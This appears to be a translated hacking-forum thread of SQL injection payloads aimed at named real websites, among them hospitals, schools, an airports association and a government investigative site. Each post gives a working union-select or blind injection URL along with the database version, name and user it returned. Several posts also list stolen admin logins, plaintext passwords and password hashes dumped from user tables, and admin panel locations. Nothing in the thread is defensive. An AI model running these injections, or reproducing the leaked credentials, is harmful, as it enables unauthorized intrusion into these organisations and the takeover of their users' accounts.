PHP: http://www.zora.ru/?a=show&id=-147+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11-- version / 4.0.27-standard-log database / zora user / zora@localhost PHP: http://www.unitedparts.ru/catalog.php?id=2+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4-- version / 5.0.67-log database / u44238_3 user / [email protected]
http://blackhillslots.com/news/?newsid=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8 Database Version: 5.0.45 Database name: blackhillslotsdb User name: blackhillslots@localhost http://midwestalarm.com/news/?newsid=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8 Database Version: 5.0.45 Database name: midwestalarmdb User name: midwestalarm@localhost http://klockwerkscycles.com/news.php?newsid=-194+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7 Database Version: 5.0.45-log Database name: klockwerksdb User name: klockwerks@localhost
Code: http://studsovet.wl.dvgu.ru/index.php?id=-375+union+select+concat_ws(0x3a,user_login,user_pass,user_nicename,user_url,user_status)+from+wp_vi_users-- database : 5.0.67 tables : wp_vi_users log: admin pass: admin
Australian Airports Association (pr5) hackers are attacking airports (= Code: http://www.aaal.com.au/category.php?id=18+AND+ASCII(SUBSTRING((select+y()),1,1))>x/* y1=version y2=database y3=user x1=52,46,49,46,49,49,45,68,101,98,105,97,110,95,52,115,97,114,103,100,55 x2=97,97,97,108 x3=97,105,114,112,111,114,116,115,64,108,111,99,97,108,104,111,115,116 version() - 4.1.11-Debian_4sargd7 database() - aaal user() - airports@localhost ---------------------------------------------------------------------------------------------------------------
1 april http://www.speedcarseries.com/news/index.php?newsid=-101+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11 Database Version: 5.0.41-community Database name: speedcar User name: speedcar@localhost http://dtsf.com/news/index.php?newsid=-302+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6 Database Version: 5.0.45 Database name: dtsfdb User name: dtsf@localhost admin:incognito http://signaturehomesllc.com/news/index.php?newsid=-20+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10 Database Version: 5.0.51a-3ubuntu5.4 Database name: signaturehomes User name: signaturehomes@localhost http://sfseminary.edu/news/index.php?newsid=-198+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8 Database Version: 5.0.45 Database name: sfseminary_edu User name: sfseminary@localhost Jokester, they changed the database and the site engine, but the SQL injection is still there... I don't know whether this counts as a repost http://truth-4-youth.net/news/index.php?newsid=-15+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9 Database Version: 4.1.22 Database name: truth4youthdb User name: truth4youth@localhost http://brookingshealth.org/news/?newsid=-214+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),useR()),6,7,8,9,10,11-- Database Version: 5.0.45 Database name: brookingshealthdb User name: brookingshealth@localhost http://huronregional.org/news/index.php?newsid=-401+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13&id=58 Database Version: 5.0.45 Database name: huronregionaldb User name: huronregional@localhost http://www.luvernecommunityhospital.org/news.php?newsid=-218+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8 Database Version: 5.0.45 Database name: sanfordluvernedb_new User name: newsanford@localhost http://nwiowahealthcenter.org/news.php?newsid=-75+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6 Database Version: 
5.0.45 Database name: northwestiowadb User name: northwestiowa@localhost http://prairielakes.com/news/index.php?newsid=-417+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11-- Database Version: 5.0.45 Database name: prairielakesdb User name: prairielakes@localhost http://urgentcareemr.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9-- Database Version: 5.0.45 Database name: docutapdb User name: docutap@localhost http://www.sfsurgical.com/news/index.php?newsid=-5+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9 Database Version: 5.0.45 Database name: sfsurgicaldb User name: sfsurgical@localhost http://mywellnessadvantage.com/news/index.php?id=&newsid=-6+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9 Database Version: 5.0.45 Database name: westernhealthdb User name: westernhealth@localhost http://www.welcoa.org/news.php?entryid=-489+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13,14,15 Database Version: 5.0.45 Database name: welcoadb User name: welcoa@localhost
Code: http://web-book.ru/index.php?page=details&book=-1+union+select+1,2,3,4,CONCAT_WS(0x2C,USER(),DATABASE(),VERSION()),6,7,8,9,10,11,12 dbuser: [email protected] dbname: db_tyre1_1 Version: 4.1.22-log
lunch User:root Version:5.0.27-community-nt [ist.stmary.edu Not a repost] P.S.: for those who will be looking for paths ;-) ======================================= Version: 5.0.22 User: [email protected] Dbname: studentservices table users: asn:asn salvesen:jubalon henryb:henryb amy:jake kim:ecolab tbarrett:tbear
directrix.ru TIC 2000 PR 3 PHP: http://directrix.ru/cat?tag=331212212121231+union+select+1,2,concat_ws(0x3A,user(),@@version,database()),4,5,6,7--+ user(): wwditrix@localhost version(): 5.0.51a-17vc-log database(): directrix
sql-blind Code: http://www.puppets.ru/index.php?id=85'+and+ascii(substring(version(),1,1))=53--+ database: 5.0.51
"Official website of the investigative directorate of the Investigative Committee..." Code: http://www.skprok.tver.ru/news/?new_id=110+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0--
Art atelier "Kostumer" + information portal "Kostumer" http://www.kostumer.ru/biograph_SB.php3?m=6&id=-1+union+select+1,2,3,4/* Database Version: 4.1.9-log
Code: http://breadmaker.karasik.org/viewRecipe.php?ID=-10+union+select+1,unhex(hex(concat_ws(0xa,username,user_password))),3,4,5,6,7,8,9+from+karasik_breadboard.phpbb_users+limit+1,1--+ db: 5.0.67-msl-icd1-log name_db: karasik_breadmaker user: karasik@localhost table: phpbb_users database:karasik_breadboard login: karasik pass: kkkVVV +limit+x,x--+ -------------------------------------------------- Code: http://prazdnik.com.ua/index.php?id=54&pid=-35180'+union+select+concat_ws(0x3a,version(),database(),user()),2--+ db: 5.0.44 name_db: newprazdnik user: u_newprazdni@localhost http://prazdnik.com.ua/admin/ log: prazdnik pass: 12345
Code: http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6,7,8,9,10,11,12-- Database Version : 5.0.67 Database name : saturn User name : [email protected] admin : Code: http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,name,passwd),3,4,5,6,7,8,9,10,11,12+from+s_ users+limit+0,1-- Code: sokolov_ка:wJwVyTMy_spr moder:mashaalenamoders I did not find the admin panel itself
Code: http://www.hdtinfo.com/news/read.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4-- user/version/db: Code: [email protected]
Database Version: 5.0.67-community Database name: pigvomit_dnwwebsite User name: pigvomit_dorner@localhost Database Version: 5.0.77-community Database name: egycoeg_egyco User name: egycoeg_egyco@localhost Login: egico Pass:egico1 Database Version: 5.0.51a-community Database name: abook_line User name: abook_linecom@localhost About 350 users! I did not dump all the users =) Database Version: 5.0.68-log Database name: mistelle User name: [email protected] Users: http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,username),6,7+from+pun_users-- Database Version: 4.0.24_Debian-10sarge2 Database name: geotekmain User name: geotekmain@localhost Database Version: 4.1.22-standard-log Database name: ecoporg_db User name: ecoporg_user@localhost Database Version: 5.0.32-Debian_7etch6-log Database name: windsurf_com User name: windsurf_user@localhost Database Version: 5032-debian_7etch8-log Database name: aa34 User name: aa34@localhost Login: admin Pass: d9c4b5ac3b13e92e26b4e025586d8a8d : dflit Dump the forum users from the phorum_users table
<<Yahha - Official website of Rashid Nugmanov>> Code: http://www.yahha.com/article.php?sid=-145+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13--+ db: 5.0.67-community name_db: yahha_mpn user: yahha_admin@localhost table:mpn_authors , db: yahha_mpn log: RN pass: xer0mem This is the site owner (not the admin; login is right from the main page) ------------------------------------------------------------- limit+186,1--+ table: mpn_users name: Андрей Дамер log: damer pass: 250676 +limit+X,x--+ all the users.......... --------------------------------------------------------------
Checked for reposts in SQL Injections [AntiBoyan] CheckeR Pr 4 http://campisis.us/locdetail.php?id=2 %26%26 1%3D2 UNION SELECT 1,CONCAT(0x6467797436,CONCAT_WS(0x203A20,VERSION(),DATABASE(),USER()),0x3566646B68),3,4,5,6,7,8,9,10,11,12 %23 VERSION(),DATABASE(),USER() 4.1.22-max-log : campisis : [email protected] == PR3 http://hamercaz.com/hamercaz/site/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12-- 5.0.22 ==
Database Version: 5.0.32-Debian_7etch6-log Database name: interbridge User name: interbridge@localhost Database Version: 5.0.22 Database name: pg_org_spurway User name: spurway@localhost Database Version: 4.1.7-log Database name: fourwinds-rv User name: [email protected] There is access to mysql.user, 13 users. IMHO, this is the admin! It does not output the root password (( Login: adminatcomp Pass:07d8ece224cf7ece : ??? Billiards Kyiv-style Database Version: 5.0.67-community-log Database name: dupletc_kiev User name: dupletc_kadm@localhost
<<Official website of the football club "KAMAZ" >> Code: http://www.fckamaz.ru/pages/news.php?id=-472+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+0x70617373776f7264--+ db: 5.0.75 name_db: fckamazru user: [email protected] ------------------- http://www.fckamaz.ru/admin ------------------- table: wp_users , db: fckamazru_wordpress log: admin pass: 03ecc478f8949ec82c3b4a6fcecd0305 ------------------- table: users log: Спарк pass: sdfsdt34t34 +limit+x,x--+ ------------------- table: users2007 log: Спарк - (Site administrator) pass: nw21 +limit+x,x--+ -------------------------------------------- -------------------------------------------- Code: http://www.krainamriy.com/news.php?id=-46+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--+ db: 4.1.22-log name_db: krainamriy user: krainamriy@localhost